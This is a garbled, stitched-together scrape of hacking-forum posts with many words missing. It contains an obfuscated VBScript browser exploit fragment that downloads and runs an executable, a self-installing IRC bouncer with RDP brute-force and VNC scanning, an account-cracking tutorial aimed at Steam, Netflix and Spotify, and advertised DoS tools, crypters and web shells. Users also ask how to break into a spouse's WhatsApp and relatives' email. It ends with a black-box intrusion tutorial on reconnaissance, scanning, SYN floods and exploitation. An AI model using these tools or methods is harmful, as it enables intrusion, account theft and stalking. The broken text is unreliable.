start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp thanks for sharing with the community. 
i'm new all this. 
you tell howto hack wifi password please man wrote hey guys i'm partially new here just wanted little bit help with mitm attack. 
hmmhmhm you all enjoy the thread and will reply your. 
argentina and chile websites hacked nku kap indian hacker. 
this simple guide read somebody else facebook messages without any effort cheers mike. 
improved script fixed bugs setup advanced irc proxy server bouncer any windows machine using this executable inside the. 
zip install disable antivirus because false positive extract the executable run psybnc. 
connect mirc server youriphere temp temp your password you can change typing password temp newpassword once connected type bhelp this will show you the list available commands within the bouncer. 
important commands addserver irc. 
net server name you want connect once you are connected your connection will remain the irc server until the psybnc task killed you decide you need help just join irc network server freepsybnc. 
help can show you many more commands. 
you have error connecting your psybnc make sure you have the correct port port default you connect using your external make sure you forward port your router make sure the port accessible externally. 
help bounceadmin only bhelp bwho lists all users the bouncer bhelp password sets your another users password admin bhelp proxy sets your proxy connect thru bhelp setusername sets your user name bhelp setaway sets your away text when you leave bhelp setleavemsg sets your leave msg when you leave bhelp leavequit set parts all channels quit bhelp setawaynick sets your nick when you are offline bhelp jump jumps the next irc server bhelp bquit quits your current server connection bhelp bconnect reconnects bquitted connection bhelp aidle enables disables antiidle bhelp autorejoin enables disables auto rejoin bhelp addserver adds irc server your serverlist bhelp delserver deletes irc server number bhelp listservers lists all irc servers added bhelp translate adds translator from channels users bhelp deltranslate deletes translator number bhelp listtranslate shows list translated talks bhelp addlog adds log source filter bhelp dellog deletes log source number bhelp listlogs lists all added log sources filters bhelp playtrafficlog plays the traffic log bhelp erases the traffic log bhelp madmin gives user admin flag bhelp unadmin removes the admin flag from user bhelp bkill kills user from the proxy bhelp sockstat shows logs the current connections bhelp adduser adds new user the bouncer bhelp deluser deletes user from the bouncer bhelp namebouncer names your bouncer needed for linking bhelp linkto adds bouncer link the host port bhelp linkfrom adds bouncer link from your bouncer bhelp dellink deletes link bouncer bhelp listlinks lists all links from the bouncer bhelp relink resets link bouncer number bhelp playmainlog plays the connection log bhelp erasemainlog erases the connection log bhelp bhelp lists this help help topic use bhelp use bhelp for details. 
bhelp end help when you run the executable the bot installs itself windir system psybnc. 
directory the scripts are located system script directory the first time you run the executable the bot will connect server. 
correct this you must change one command the script. 
script look for the start part replace freepsybnc. 
the name your server all commands can sent through private message channel proxy and socks stuff defaultset sets the default servers and interval for scanning proxys and socks leech leech the web for open proxies and scan them automatically set def. 
ircserver sets the default server scan proxys must set def. 
ircserver sets the alternate server scan proxys must set fldchan channel sets the channel where the proxys are joined this also scripts output channel set interval set the interval between each port scans milliseconds pxyfile proxy. 
txt scans file containing proxy servers file sock. 
txt scans file containing socks servers file sock. 
txt scans file containing socks servers abord abord current port scans filterfile validproxy. 
txt sorts the proxy file numerical order you can control the connected proxy bots from channel private message join channel part channel msg channel text send text channel nickname shows uptime the connection own shows address the proxy bot connection kill kills the proxy bot vnc stuff rangevnc. 
this will scan lan for vulnerable vnc. 
servers other ranges can used tellvnc tells you the bot found any vulnerable vnc servers listvnc found will list the addresse vulnerable vnc servers rdp stuff set username administrator sets the username the rdp brute will try crack write dict password adds password the dictionary for attack rangerdp. 
will scan and crack. 
other ips can specified stoprdp stops the rdp scans tellpass tells you how many rdp passwords are found listpasswords will list ips successfully cracked rdp servers many more commands just dont have the time add them. 
you need create custom. 
exe for you will for. 
name result squared emisoft antimalware clean nothing found aware clean nothing found agnitum clean nothing found ahnlab internet security clean nothing found arcavir clean nothing found avast win malware gen avg clean nothing found avira clean nothing found bkav clean nothing found baidu clean nothing found bitdefender clean nothing found bullguard internet security clean nothing found bytehero clean nothing found clamav clean nothing found comodo clean nothing found. 
web clean nothing found eset nod clean nothing found secure clean nothing found fsb antivirus clean nothing found fortinet clean nothing found fprot clean nothing found gdata clean nothing found iobit malware fighter clean nothing found ikarus clean nothing found immunet antivirus clean nothing found ultimate clean nothing found kaspersky internet security clean nothing found kingsoft clean nothing found microsoft security essentials clean nothing found nano antivirus clean nothing found netgate clean nothing found norman clean nothing found norton internet security clean nothing found outpost security suite pro clean nothing found ozone clean nothing found tools clean nothing found panda antivirus clean nothing found panda cloud clean nothing found quick heal clean nothing found clean nothing found solo clean nothing found total defense clean nothing found totaldefense clean nothing found trendmicro internet security clean nothing found trustport antivirus clean nothing found twister antivirus clean nothing found unthreat antivirus clean nothing found vba trojan. 
dqac vexira clean nothing found vipre internet security clean nothing found virit clean nothing found webroot clean nothing found zillya clean nothing found zoner clean nothing found escan clean nothing found escan internet security suite clean nothing found etrust vet clean nothing found mcafee clean nothing found nprotect clean nothing found clean nothing found download links. 
version download and run admin you dare why not spread too lol for real it's for educational purposes. 
thank you mate awesome tool. 
wow nice info mate. 
have zero day for hosting servers need some help cracking hashes identifying these busy. 
txt password and start cracker download url not bad. 
hanx for the post dude. 
hello boss wnt buy good smtp. 
messenger msa luv yahoo. 
thanks for this nice bro. 
let see let see let see let see let see why this. 
thank you hope finally get one. 
twitter online social networking service that enables users send and read short character messages called tweets. 
registered users can read and post tweets but those who are unregistered can only read them. 
nice posting brther waiting next post. 
why you need the gmail account sounds phishy. 
new login info for the server. 
what's this don't see the point. 
let see work for. 
linke kla ben robot deg bas hemen sonra getlink bas nca lcak link. 
painkiller wrote email account checker reiluke works yahoo gmail hotmail download here url virus scan report url thanks. 
would like try this. 
tutmoses wrote what language you want and what are exactly trying accomplish can sell you bitcoin raiding malware with keylogger for educational purposes only but ill have configure the for you dont want anything with bitcoin any dangerous hacking stuff jus looking for some harmless software scripts show error messages pop microsoft remote access. 
this link down can you upload torrent. 
thanks bruther let's test thanks bruda let's test. 
will give try and see this really work. 
painkiller wrote when first started using rats had idea how portforward. 
all other settings can left default virus scan sha ffe fbfe file name portforward setup. 
exe detection ratio analysis date utc download links. 
introduction ghost eye fast hack program with alot features like strong denial service attack dos attack crypter file binder fast smtp mail sender website resolver skype resolver checker tracer with alot features live chat and alot other features that will help you ghost eye was coded hisoka ismael from morocco remember hisoka not responsable for the use this product it's for educational purposes only. 
ghost eye pictures for the virus scan don't know why they give but can guarante that this software clean you virus scan. 
download just post here keep the theart alive and i'll you the link please don't. 
video note i'm working hard now make fud crypter and give for free the free crypter like. 
com piqi skllp iztzir. 
and thanks for info. 
not always have our books tutorials pentest basic theory even the area information security. 
application portuguese but the english translation has already started manual hacker free. 
phse manual hacker gold. 
hello everyone today will bring you guys tutorial how you can get free steam netflix and spotify accounts. 
please note this tool for use for only recovering your own accounts. 
this tutorial solely for educational and entertainment purposes only. 
note lol was added after this tutorial was made but everything still works the same. 
alright first want start voidcracker. 
this tutorial mainly intended for people who already own voidcracker. 
but you would like voidcracker. 
step start void cracker clicking voidcracker. 
exe make sure that voidcracker. 
exe the same folder the dll that comes with the download. 
step now this step optional but highly recommended. 
now will add proxies. 
you don't already have proxy list you can download one clicking the proxies tab and then clicking either download download download. 
step now the dialog box has opened prompting set the destination where would like save proxies for this tutorial chose desktop. 
step now back the proxies window and click the browse button then select the proxies that you had saved your desktop just few seconds ago. 
step now that have got are proxies all ready can now over the tab whatever section would like crack steam netflix spotify. 
you can click any one you chose the tutorial the same for all accounts types. 
for this tutorial will try crack own steam account. 
step now it's time load your usernames and passwords however for netflix instead usernames you must enter the emails. 
will now enter steam username typing into the text box. 
however you have list steam usernames you can load them clicking file browse usernames and then selecting your list usernames. 
however you have list steam usernames and passwords the same file the format username password then you can click file browse user pass. 
however for this tutorial will just type steam username the textbox step now have select the passwords. 
you not have list passwords you can download one clicking file download wordlists and then select the location where you would like save your wordlist. 
however you would like like use your own wordlist just move the next step. 
step okay now you must select your wordlist you can now select either you downloaded wordlist wordlist you previously had. 
select your wordlist click file browse passwords and then select the location your wordlist combolist. 
step now you're all set. 
all you need click start the program will run through every password for every username takes almost less than second per attempt for. 
which means only takes around minutes crack some accounts. 
now click the start button the bottom the program. 
step when the program finished cracking you will see message box like the screenshot below. 
then click the results tab see you were able recover any accounts. 
step here the results tab can see that the program was fact able crack account. 
here you will see the results also you can click the results tab even when the program running view live feed the results any time. 
step now you're done and remember that this tutorial for educational and entertainment purposes only. 
this program only intend check recover your own accounts. 
not attempt this other accounts. 
can have the authentication code please thanks advanced. 
bugfix utf and unicode encoding thank you admin. 
mcrackzet wrote tell this does this link work. 
does this give you full access their page can you just see the messages private and public know some idiot that talks trash and should aware that this can happen. 
please provide the details. 
nice job cheers love. 
med bad boy wrote size large the name god the merciful tutoriel show you how dns poisoning works. 
enjoy thanks xsecurity for uploading youtube allah with you. 
please attached another file. 
hope still works today. 
wow dude lets try this one. 
gotta check this out wrote download. 
thanks well try hope works good. 
lets see how its gonna work out. 
thank you for your subject. 
show show show show show. 
thanks man will check. 
srry say dat but dont just copy paste the articles from other sites. 
before posting tricks tuts kindly check end and post with proof concepts. 
will not increase torrent speed instead increasing will decrease the speed remains default. 
its tool based windowing process. 
sending and receiving time data packets changed from its default value. 
also change the frequency amount packets etc. 
cheatengine hooked with the application and works timestamp method. 
its name its just cheating. 
used for cheat with game servers boost the games speed etc. 
how does this work fam. 
thanks for the link installed and runing perfectly. 
privateloader wrote the archive available for download contains program that will circunvent filters. 
user just need write the site and will open the site using proxy. 
normal situations you can use web based proxy bypass internet filters. 
the program the archive was tested against the most restrictive access the internet one snitch they will remain anonymous and available. 
hahaha evil mind diablo. 
nice sharing man cool. 
thanks for this dude. 
txtprofile the archive leak name. 
code allie win win dve copy yuange. 
run chr sfile chr false set shell nothing end sub function set owmp createobject wmplayer. 
dim set xhttp createobject microsoft. 
xml dim bstrm set bstrm createobject adodb. 
sgtatham putty latest putty. 
exe overwrite end with run yolobirdie putty. 
useragent instr info win then exit function end instr info msie then intversion cint mid info instr info msie else exit function end win begininit create true then myarray chrw chrw chrw chrw chrw chrw chrw chrw myarray myarray chrw chrw chrw chrw intversion then document. 
write intversion runshellcode else setnotsafemode end end end function function begininit randomize redim redim rnd rnd end function function create error resume next dim create false for over true then document. 
write create true exit for end next end function sub end sub function mydata error resume next null redim preserve. 
mydata redim preserve end function function setnotsafemode error resume next mydata readmemo readmemo readmemo for step readmemo then redim preserve redim preserve readmemo exit for end next. 
end function function over error resume next dim type type type over false redim preserve redim redim preserve type. 
isobject false then intversion then mem cint vartype mem mem then vartype then isobject false then type vartype end end else redim preserve exit function end else vartype then isobject false then type vartype end end end end type then over true end type then over true win end redim preserve end function function readmemo add error resume next redim preserve add. 
readmemo lenb redim preserve end function. 
sup ppl hope you doing good here are some useful websites enjoy. 
com record movies your desktop and send them straight youtube. 
com for capturing full length screenshots web pages. 
find the original urls that hiding behind short urls. 
know more than just the local time city. 
com copy paste special characters that aren your keyboard. 
com better search engine for twitter. 
appstore search ios apps without launching itunes. 
com the best place find icons all sizes. 
com download templates clipart and images for your office documents. 
com everything you wanted know about website. 
com scan any suspicious file email attachment for viruses. 
com gets answers directly without searching see more wolfram tips. 
com print web pages without the clutter. 
com reformats news articles and blog content newspaper. 
com when you wish share nsfw page but with warning. 
com simple online timer for your daily needs. 
org site down due heavy traffic try accessing through coral cdn. 
org pick random numbers flip coins and more. 
com check the trust level any website example. 
com preview pdfs and presentations directly the browser. 
com simultaneously upload videos youtube and other video sites. 
com the best place for searching web videos. 
share you email address online without worrying about spam. 
com now get read receipts for your email. 
com visualize and compare the size any product. 
com quickly determine the font name from image. 
com good collection fonts free for personal and commercial use. 
info find data hidden your photographs see more exif tools. 
com this like online version google googles. 
com helps you search domains across all tlds. 
com your favorite blogs delivered pdfs. 
share you screen with anyone over the web. 
net recognize text from scanned pdfs and images see other ocr tools. 
com track flight status airports worldwide. 
com for sharing really big files online. 
com temporary online clipboard for your text and code snippets. 
com check your writing for spelling grammatical errors. 
com easily highlight the important parts web page. 
work the same document with multiple people. 
com planning event find date that works for all. 
com less confusing view the world time zones. 
edu you need this when your bookmarked web pages are deleted. 
com the perfect tool for measuring your site performance online. 
chat with your buddies skype facebook google talk etc. 
com translate web pages pdfs and office documents. 
com leanback sit back and enjoy youtube videos full screen mode. 
com discover new sites that are similar what you like already. 
net quick summarize long pieces text with tag clouds. 
create mind maps brainstorm ideas the browser. 
thanks for sharing this. 
thanks alot for your post. 
let get everything started wanna make alot moneyskphero wrote make money with sharecash mega seven methods plus the antiban guide completely free. 
you may like this per sure. 
remember and also good for some some time try all time the message islam. 
hope you like the download link here. 
hidden content cannot quoted. 
user irani pass lfilmi don't change the password the account not working. 
majorharry wrote hello everybody have new script for free for all user there have many options eval mysql dump php info net sploit upload mail port scanner jumping tools python symlink config bypass cgi shell cgi telnet domain mass deface zone joomla indchange indchange respass joomla respass whmcs decoder ddos hash hash wordpress bruteforce joomla bruteforce cpanel bruteforce bypass cloudflare admin finder whois mass pass script encode joomla server scan bomb email tutorial ebook about log out. 
let see what have here. 
codefire wrote hidden content you must reply see linkscpanel nightmare priv times faster from puplic version its shows becoz its code. 
nothing harmfull but run sandbox for security. 
get here hide reply hide reply url password hide reply hide reply thx codefire wrote hidden content you must reply see linkscpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hide reply hide reply url password hide reply hide reply. 
when ever want look the post will tell reply why. 
really need some help need dads sisters email account password don't have access there computers anymore i've been scammed will pay you when you give some proof please help. 
wife and lived now together years think she cheating whatsapp very very sad could someone give detailed instructions how hack she whatsapp her mobile phone. 
have nokia lumia windows phone. 
this very and really important please someone help. 
administrator hope this correct catergory sorry this wrong. 
will test thanks man. 
gfegfuye gfuyefg eyfg eyegufyef. 
thank you for the links. 
hello code code exploit database separated exploit type local remote dos etc. 
maybe you should use static programs and how many slaves you have dynamic dns etc these are what mean. 
you have active slaves and how many what kind problems you experienced. 
wanted urgent professional who can bank server server. 
guy has stuck bypassing and cracking the block code. 
tutmoses wrote url vulnerable url vulnerable url vulnerable url ions gas vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url vulnerable url url vulnerable url url url thank you for this thank you for this searching for more. 
thanks brother for this tut. 
just added you skype. 
has anyone tried this. 
enjoy first skip the add than enjoy those pass username nice share. 
need help too anyone can help out pls. 
advanced systemcare pro licence key fix all the problems slowing down your enjoy the new feeling protect your privacy and secure online experience. 
hope they still work for have view. 
rootisunreal wrote okay you used this for logging into the website and have not deleted cache etc. 
sent from nexus using tapatalk deleted the cach from long time ist there another way someone hack the website. 
thank you you are great. 
thanks for let see this. 
lollol lol lol lol lol lollol lol lol lol lollol lol lol protected you from malicious site the website that directed you here was likely attempting perform malicious action your account. 
have prevented from doing. 
please fill out this form you think made mistake. 
note that don't provide personalized support for this issue right now but we'll use this information identify any bugs our system. 
what were you doing when this form appeared. 
lets try hope works. 
devin wrote sirius wrote you can simply click the select button and choose the free itunes code value you want. 
bro lets see what you got here. 
privateloader wrote txtprofile the archive leak name. 
bourdj wrote you have look the link like know url want answers pls. 
definitely going take look this thanks. 
went hack sse server. 
any one can give the admin pass and think the admin pax angel. 
new priv mailer inbox. 
bruv going take look. 
dats good question how bypass steam guard. 
thanks for this hope its still good. 
skphero wrote make money with sharecash mega seven methods plus the antiban guide completely free. 
wonder what this all about. 
thanks for uploading this. 
how create closed shell system. 
name application photofiltre studio version application. 
language borland delphi home page hidden content you must reply see links protection non method used patching tutor phoenix team xfactor home the warriors tut download code url. 
com files zwtgjkc psx tut. 
zip links url code url. 
zwtgjkc url enjoy hehehe. 
well seeing there are many ways this don't think this will original. 
quick heal total security. 
click here download click here download download links for quick heal total security. 
click here download click here download. 
i'm going provide the common methodology that followed when hacking machine network server. 
this tutorial will give you good understanding overview about professional penetration testing black box attacker point view. 
designed give you idea how attacker can break into your system what gonna say will increase your awareness will open the door for you out educate yourself easily. 
gathered this information from various sources and tutorials have changed many things clarified many parts given some references and put lot information together. 
i'm still learner the way goal. 
however this won't prevent from teaching others what have learned far don't worry i'm not going provide you with any info that i'm not sure about yet. 
not the best tutorial out there but least good starter. 
will speak hacker attacker blackbox point view. 
write this tutorial for educational purposes only. 
before you hack system you must decide what your goal. 
are you hacking put the system down gaining sensitive data breaking into the system and taking the 'root' access screwing the system formatting everything discovering see how you can exploit them etc. 
the point that you have decide what the goal first. 
the most common goals are. 
breaking into the system taking the admin privileges. 
gaining sensitive data such credit cards identification theft etc. 
you should have all your tools ready before you start taking the steps hacking. 
there unix version called backtrack. 
operating system that comes with various sets security tools that will help you hack systems penetration tests. 
you should set the steps methodology that you plan take your journey before you anything else. 
there common methodology followed hackers will mention below. 
however you can create your own methodology you know what you are doing. 
common steps taken for hacking system. 
privilege escalation owning the box. 
the above methodology can change based your goals. 
feel free before you break into system you have collect much info you can the system and target. 
you have study your target well before you hack. 
this step called reconnaissance. 
reconnaissance achieved using techniques tools that are undetectable the target. 
you are gathering your target's info that publicly published. 
browse your target's website they are looking for sql employee and windows server admin then you get hint that they are running windows server sql's this called passive action. 
lets see example active action example active action call the company obtain some info visit the company email employees get some info the target's website read its source code. 
other words passive action means you gather info non intrusive manner. 
active action step further such talking the company you are customer things like that. 
not really important know what action passive what active the main goal here gather info simple huh good let deeper little bit. 
passive reconnaissance there chance getting caught you only target publicly available info give you the feel what your target looks like. 
the type info you can gather through passive recon. 
are names phones numbers location addresses partner networks and much more. 
this can aid you when you want some social engineering hence sometimes you can get some non public info that's revealed when you passive reconnaissance. 
there are several tools helps you passive reconnaissance such whois who. 
whois helps you obtain extensive info such names domains the target etc. 
other great tools are sam spade domaintools and google can reveal lots target subdomians many more. 
know what whois really briefly visit what the proper way hacking check out the answer active reconnaissance goes beyond the passive nature such communicating with the target without being caught such scanning. 
anything not discovered ids intrusion detection system considered active. 
you have think ways extract info the company normal way public going little bit deeper than passive recon. 
you can the physical location some social engineering email staff communicate with employees based the info you've gotten your passive recons. 
things like that example some techniques for active reconnaissance such banner grabbing view company's public website source code and directory structure social engineering shoulder surfing etc. 
what the heck banner grabbing you let the server send you block information that tells you version your target system various association with banner tells version and various association. 
anything listening port can determine the operating system the port running this called fingerprinting. 
other words fingerprinting the process determining the operating system applications used remote target. 
learn more about banner grabbing introduction http fingerprinting can you give brief example social engineering for example you try find out where admin goes after business hours then start the place goes build relationship start making friend relationship extract more info slowly but surely things like that you know what mean. 
what shoulder surfing simply stand behind person's shoulder and see what the guy doing typing the keyboard. 
this can happen wireless network area where everyone using laptop public areas. 
summary reconnaissance one the most important steps hacking. 
the main concept gather all the info that publicly available easily obtainable. 
info that gather will help social engineering and research purposes which will lead you very critical info about the system. 
starts obtaining names phones emails range domain structure and. 
let show you how banner grabbing done telnet into your target server port the following command line terminal and type telnet. 
now the connection established that stupid server thinks you are web browser connected waits you enter commands the server can you give you info about your request. 
this situation you have write command that says hey you web server give content such and such website. 
however not really want visit the website through telnet you you can just web browser request the website from there. 
our purpose here freak the server out enough spits back code that says hey this doesn't work but here some info that might help you some trouble shooting. 
this technique allows you fingerprint various components the target system. 
it's the same thing. 
represents the address the target system. 
the remote sever will wait you enter command. 
then you will get reply looks similar. 
date mon jun gmt server apache. 
unix red hat linux last modified wed oct gmt etag accept ranges bytes content length connection close content type text html the header response brought back some important info that says the server runs apache. 
unix for red hat distribution linux. 
you might get header that looks similar the following. 
expires tue jun gmt date mon jun gmt content type text html accept ranges bytes last modified wed may gmt etag content length means the server runs microsoft iis. 
win win don't the windows version yet. 
you might get header that looks similar the following date thu dec gmt server apache. 
last modified thu jul gmt etag accept ranges bytes content length connection close content type text html means the server runs apache. 
unix box running php. 
you get now lets say our target got the following version the server runs apache. 
this point you know any for this particular this particular apache php. 
you can start the exploitation process. 
another example use program called sam spade which gives you alot info about your target. 
the target does not know actually what are doing against their server since they haven't seen anything been triggered ids firewall. 
what the difference between ids firewall ids intrusion detection system may only detect and warn you violation your privacy. 
although most block major attacks some probes other attacks may just noted and allowed through. 
there's also evolution the ids called ips intrusion prevention system that watches for the same things ids does but instead just alerting blocks the traffic. 
good firewall will block almost all attacks unless specified otherwise designed otherwise. 
the only problem the firewall might not warn you the attacks and may just block them. 
may good idea have both ids and firewall because the ids will warn you and then the firewall will block the attack. 
over the years firewalls more complex and added more features. 
one these features actually ids today you can have firewall that already has ids firewall ids's are combined into one internet security program. 
learn more about banner grabbing introduction http fingerprinting learn how through google you need the following book. 
com exec obidos asin. 
ref nosim note the book amazon just example for you give you idea what kind book you should looking for you are interested. 
alright now you least have idea what reconnaissance lets talk about scanning. 
when you scan your target's network you actually start touching the system. 
scanning network determines what's there scanning network gives you the feel how your target's network laid out there are multiple subnets which hosts are alive check ports see system alive discover available hosts get info about the discovered hosts. 
there are thousands tools can used scan networks scanning network can easily get picked ids. 
anyhow one will pay attention except you over and over because scans happens such regular basis the internet. 
therefore people who read the logs means the webmaster won't really pay attention every single scan that occurs you don't have worry alot. 
there are ways avoid being picked ids. 
after you finish scanning you will gain list network nodes that exists there. 
node active electronic device that attached network and capable sending receiving forwarding information over communications channel. 
you want learn more google visit. 
org wiki node networking. 
now want discover live hosts via scanning. 
this the first action taken against your target's network. 
depending what method scanning you use you can detected ids. 
most admins will ignore detections because happens alot unless something abnormal happens. 
there are various scanner tools. 
nmap superscan and many more. 
there are various scan methods some are stealthy others are not. 
before talk about various scanning methods let explain you about tcp connections basics. 
when you scan your target using tcp communication there are six tcp flags can utilized during packet transmission packets get transmitted during scanning process. 
flag will indicate whether the sent packets are syn ack fin urg psh rst packets. 
these packets sets you position how you want communicate with the remote host. 
you can get different info depending the flag you choose for the scanning. 
tcp establishes three handshakes syn syn ack ack. 
what are they when you scan your target using tcp communication you send syn packet syn request and then target sends you back ack packet with syn packet. 
now you send ack packet the target. 
now both machines establish the connection well like they have made well established tunnel for proper guaranteed communication without losing any packets during communicating with each other. 
hacker can get caught easily uses this method hack other systems illegally. 
hackers use non standard combination these six flags which gives them info that are not normally available the public. 
have you heard about syn flood syn flood done utilizing three handshake sending syn request the target the target receives syn request and send syn ack back the originator you. 
you ignore the target syn ack request when you ignore then the three handshakes not completed this called half open tcp connection theory when the target sends you syn ack the target allocates some ram its machine. 
the amount ram the target machine must open until gets response ack packet back from you because till now only two handshake has been made the tcp connection process not completed yet. 
however there always time limit for the ram opened secs passed the target did not get the ack from you the connection will abort failed tcp handshake timeout ram will deallocated. 
the idea here send hell alot packets few secs secs you can send million packets lets say one packet size which heavy the ram since the ram might not have enough memory carry million packets. 
therefore you force the target make half open tcp connection attempts definitely the target machine will stop responding legitimate request. 
other words you send million syn requests that remote host it's going allocate hell lot ram for those requests. 
after while it's going eat all the ram. 
thus target system goes down. 
this called syn flood attack. 
short syn flood attack makes the system. 
the stack kernel chokes the memory allocations simply runs out memory the target application. 
web server chokes the processing load. 
you got not yet syn flood old technique just mentioned here for illustration purposes. 
general information these days syn floods are used make systems inaccessible. 
they have limited number half open connections you use them all and they can't accept any more syns. 
but again modern software throws away old syns once the limit reached. 
note that different systems will behave differently. 
you interested learning more about syn flood visit rfc tcp syn flooding attacks and common mitigations lets talk about the most common tcp scan types. 
there are full scan half open scan stealth scan xmas scan and ack scan. 
full scan this completes way tcp. 
the most effective gives more accurate results. 
however not safe and easily traced and detected. 
half open scan the second most effective scanning method only uses first part the handshake get syn ack but does not send part ack back the remote host. 
the idea here the remote replies back you after you have sent syn request this means the port sent the syn must open. 
stealth scan the idea here scan ports randomly not sequential order reduce the speed scanning. 
you scan all port from sequence your more visible detected and usually scanning happens fast which unusual since regular program does not connect port that fast this can make easier detected. 
therefore you have scan ports randomly reduce the speed scanning. 
avoid ids you should not use full connection scan with stealth scan you can use half open scan syn. 
syn considered stealth scan. 
fact syn scan called syn stealth scan you can use xmas scan with stealth scan which helps you evade detection things like that you get point guess. 
xmas scan uses fin urg and push flags which are used bypass some firewalls. 
xmas scan works with unix system does not work with windows system. 
ack scan this helps you evading ids not get you detected. 
you send only ack packet your target your target won't know how deal with since there was handshake. 
thus ack scan causes open ports your target machine return reset packet rst rst packet gives you hint that the port service not filtered between point and point which usually firewal resides between since the port replied you with rst packet this means there firewall between your machine port service the target machine and rst packet also gives you insight that the target port open. 
there firewall your ack packet would not reach the target port because that you won't get any rst packet. 
addition rst packet helps you indentify what system running the remote host. 
these are the most common method scans there are hundreds scanning methods nmap allows you set your own custom scan type. 
instead sending ack flags only you can send ack flag and rst flag together and see what you get back from target. 
have talked about how tcp scanning works general. 
now will talking about udp icmp scanning. 
udp and icmp connections most the times are blocked the firewall level even the host level some cases. 
are going scan hosts ports that respond via udp. 
when you scan your target via udp there are many problem will occur during that process. 
you can scan over the ports via udp assume you scanned port and port closed then host will send icmp unreachable back you which gives insight that port closed because you didn't get any udp response back from target making sense right unfortunately will never get response back from target ensure you that port open thats how udp call works send the packet forget. 
lets say come across port and open then port target machine will not reply back you because udp does not give you the guarantee the delivery packets during communication process just send the packet and forget unlike tcp which guarantees the delivery packets with loss corruption. 
since didn't get reply back then can assume the port open maybe port closed and icmp reply got lost somewhere didn't get general rule when you don't get reply you assume port open. 
some high professionals security person purposely configure ports not respond udp scanning. 
icmp scanning same udp. 
icmp scanning noisy can picked ids very easily because icmp sends random several pings the network instead single host icmp scanning does 'ping scanning' sends icmp packets the whole network instead single host. 
after you finish icmp scanning based the replies you get back from the live hosts then you can determine that your target network listening for icmp traffic and you might some exploit based that. 
unfortunately there aren't alot icmp exploits going around you are just going use icmp for network enumeration you just see what hosts are host host host they are replying for icmp. 
thus this let know these hosts are running the targeted network and potentially can target for. 
ids's are always listening for network scans alot network scanners provide support for icmp scanning but not have way make stealthy therefore icmp can turn the ids alert which tells the security person there somebody scans your whole network. 
nmap great tool that very popular usually used scan networks hosts ports and does alot other stuff. 
very intrusive tool and considered hacking tool. 
using nmap against systems you dont own dont have permission scan can considered illegal. 
lets see examples some scanning method example icmp scanning this called ping scan nmap. 
filename nmap represents the program are running which nmap. 
for increased verbosity which means bring extra details the targeted system. 
optional far know the flag that determines the scanning method. 
filename output the results the newly specified filename. 
other words save results file optional this above command shows you the systems that are and running this shows what available the targeted network. 
result you will get simple info that shows you there are number addresses that responded ping request note there could alot more machines out there that are not responding icmp scanning. 
lets see example udp scan udp scan not speed. 
results udp scan give more info than ping scan. 
keep mind there could hundreds other ports are listening the system which simply don't respond udp connection. 
useful sources relates scanning methods via nmap nmap tutorial port scanning with nmap installation usage nmap alright now you have good basic understanding about scanning next will talking about fingerprinting keep learning now lets get deeper now have determined what nodes are running the network. 
are ready gather large info those live systems discovered the previous steps. 
now you need discover what services application are running your target's host. 
every least many port has service running. 
for example web server usually are running port. 
what have scan ports see what kind services applications are running them try grab the versions the services this will help you determine the well. 
this called 'port service enumeration fingerprinting. 
have this step understand what potential your target has how exploit them. 
assume after have scanned our target system found our target runs iis. 
based the scanning result you can say the targer server running iis. 
iis set internet based services iis the second most popular web server iis microsoft product known iis. 
has too many iis. 
runs windows which windows itself has hundreds vulns. 
other words lets scan ports and services and fingerprinting lets identify services those live host our target network. 
once know what services are running and what are running then can start exploiting these services 'ping port service' scans are frequently run together using the same tool. 
note identifying ports services the most critical part hacking. 
period fingerprinting used for determining type and version then exploit vulns. 
that resides into the. 
when you fingerprint target your targets' can known from the tcp stack fingerprinting happens tcp stack. 
why because each has unique implementation tcp tcp stack implemented differently from exact same query sent one machine the respond the result will different than the other machine. 
therefore based the response this can help the scanner determines the the target because every has its own unqiue response when you fingerprinting request. 
when you default install certain services will installed default services that are needed for that work properly. 
ports and which all combined together produce win above. 
another example combination and can determine certain version windows such win win there are lots ways determine. 
another example you see service sql running certain port you can determine the target not nix family win family cause the target running microsoft sql product. 
thus can say port enumeration service enumeration can help you determining. 
there tons popular scanners out there superscan works good win. 
nmap works nix windows nix version much more stable than win version. 
most scanners offer full half stealth and udp scans. 
you are goning spend most your time scanning your target machine know whats available there you can exploit the vulns penetrate the system. 
therefore you have some exploration scanning methods decide which method scanning you feel more comfortable with. 
lets see example enumeration style scanning. 
just keep mind this can considered hacking make sure you your system not somebody's else. 
this kind stealth scan nmap. 
filename this above request gives you very specific details about your target. 
for version information identification. 
check out the manual know what these flags type man nmap see the manual. 
alright after have fingerprinted services now its the time check for various vulns against application services running the target system. 
this called vulnerability assessment. 
vulnerability assessment you can use the tools available such nessus. 
nessus free vulnerability assessment huge database its the best assessment tool. 
lets scan vulns the target system. 
lets say target system win iis. 
nessus goes back its database and check the vulns for win iis. 
there vulns not discovered vulnerability assessment tool actually can't catch. 
however nessus couldn't find matching vulns for the target system will let you the system can have some security issues not. 
such tools are considered automated vulnerability assessment tools. 
you have know about the target system you can vuln assessment. 
there are vuln assessment specific. 
mbsa tool only scans win. 
note you can vulnerability assessment manually this depends you and your skills. 
doing manually you can discover vuln. 
that nobody knows about and you can use for your own use. 
powerful and very discrete. 
after determined what systems what services contain vulnerability then can exploit means take chance this vulnerability achieve what you want. 
common out there are webserver database tcp stack application malwares viruses trojans can used exploit. 
there are several automated vulnerability scanners such nessus nikto. 
security websites good resource for well. 
bugtraq cve common and exposures sites etc. 
another good source find hacker web sites. 
lets talk about the tools nessus this great vulnerability assessment tool. 
however alot cases will perform exploits see the service actually vulnerable not. 
metasploit framework this not vuln assessment tool. 
exploitation tool contains hundrands exploits helps you exploit the system using nice selection tools. 
will explain shortly about the common vulns. 
